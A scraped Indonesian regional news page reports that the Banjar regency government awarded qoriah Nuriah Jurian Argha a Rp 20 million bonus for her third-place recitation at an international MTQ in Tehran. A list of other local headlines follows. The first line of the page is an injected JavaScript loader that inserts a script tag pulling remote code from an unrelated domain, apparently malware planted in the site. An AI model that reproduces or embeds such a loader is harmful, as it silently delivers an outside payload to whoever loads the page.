(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: Kabupaten Banjar

Raih Prestasi di MTQ Internasional, Nuriah Dapat Bonus dari Pemkab Banjar


KANALKALIMANTAN.COM, MARTAPURA – Nuriah Jurian Argha qoriah asal Kabupaten Banjar tang meraih Terbaik III cabang tilawah 30 juz pada MTQ Internasional di Teheran, Iran beberapa waktu lalu mendapat penghargaan dari Pemkab Banjar.

Kader Lembaga Pengembangan Tilawatil Quran (LPTQ) Banjar dapatkan bonus dari Pemerintah Kabupaten Banjar, di Mahligai Sultan Adam lantai I, Selasa (5/3/2024) pagi.

Bonus sebesar Rp 20 juta itu diserahkan Bupati Banjar H Saidi Mansyur kepada Nuriah atas prestasi yang diraihnya sebagai Terbaik III cabang tilawah 30 juz pada MTQ Internasional di Teheran, Iran.

Baca juga: Mandi di Sungai Belakang Rumah, Bocah 4 Tahun di Alalak Ditemukan Tak Bernyawa

Bupati Banjar H Saidi Mansyur sangat mengapresiasi dan sampaikan terima kasih atas prestasi yang telah ditorehkan oleh Nuriah, dan meminta prestasi tersebut bisa dipertahankan dan lebih ditingkatkan.

Dia juga sampaikan pesan kepada kader yang lain agar terus mengasah kemampuannya agar menjadi kader yang mumpuni dan mampu memberikan yang terbaik bagi daerah dan bangsa.

“Terima kasih kepada LPTQ yang selama ini terus memberikan pembinaannya,” ucap dia.

Baca juga: Damkar Banjarbaru Siap Tambah Tiga Armada Baru

Ketua LPTQ Banjar H Masruri sangat mengapresiasi dan bangga atas prestasi yang telah diraih oleh salah satu kader terbaiknya.

“Semoga prestasi yang telah dicapai Nuriah bisa memotivasi kepada seluruh kader-kader LPTQ agar bisa belajar bersungguh sungguh sehingga bisa meraih prestasi yang sama,” harap dia.

Masruri menyebut selain Nuriah, pada 2023 lalu beberapa kader terbaiknya juga pernah meraih juara dikancah Internasional seperti Ramadan Najwa meraih Terbaik I MTQ Internasional antar bangsa dan negara di Kota Medan Sumatera Utara serta Hj Raudhah Terbaik II MTQ Internasional di Malaysia.

Baca juga: Tukang Bengkel di Banjarmasin Nyambi Jual Sabu Dibekuk Polisi

Sementara Nuriah didampingi sang ayah Jurian mengaku sangat bersyukur atas prestasi yang diraihnya.

Dia juga menyampaikan terima kasih kepada seluruh pihak khususnya Pemkab Banjar atas dukungan yang diberikan baik dari segi pelatihan maupun pembinaan hingga pemberian bonus ini.

“Alhamdulillah Allah kasih yang terbaik. Insyaallah uang bonus dan juara ini akan saya gunakan untuk memberangkatkan orang tua umrah,” tutup dia.

Turut mendampingi kegiatan penyerahan bonus Kekemenag Banjar HM Rofi’i serta ketua LPTQ dan pengurus. (kanalkalimantan.com/dkispbanjar/kk)

Reporter: kk
Editor: Dhani


Muhammad Andi

Recent Posts

PKS Banjarbaru Buka Penjaringan, Siap Koalisi Tawarkan Kader Sendiri

KANALKALIMANTAN.COM, BANJARBARU - Dewan Pimpinan Darah Partai Keadilan Sejahtera (PKS) Kota Banjarbaru membuka pendaftaran bakal… Read More

1 jam ago

Hidup Makin Tenang, Hadapi Risiko dengan Asuransi Pelita dari BRI Life

KANALKALIMANTAN.COM, - Asuransi merupakan salah satu bentuk perlindungan yang perlu dimiliki setiap orang. Dengan memiliki… Read More

15 jam ago

10 Mei Hari Lupus Sedunia, Yuk Kenali Penyakit Lupus

KANALKALIMANTAN.COM - Peringatan Hari Lupus Sedunia ini diadakan pada tanggal 10 Mei setiap tahunnya. Hari… Read More

15 jam ago

Teror Buaya Muara di Pelambuan, Warga Diminta Jauhi Sungai

KANALKALIMANTAN.COM, BANJARMASIN - Buaya yang kerap muncul di Sungai Pelambuan, Kecamatan Banjarmasin Barat, Kota Banjarmasin,… Read More

16 jam ago

Satgas Distribusi Material ke Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pelaksaanan program TNI Manunggal Membangun Desa (TMMD) ke-120 Kodim 1001/HSU-BLG di Desa… Read More

20 jam ago

Yakin ‘Pemilik’ 13 Kursi Golkar, Acil Odah Lamar Nasdem Koalisi di Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARBARU - Hj Raudatul Jannah atau Acil Odah siap ramaikan kontestasi Pemilihan Kepala Daerah… Read More

22 jam ago

This website uses cookies.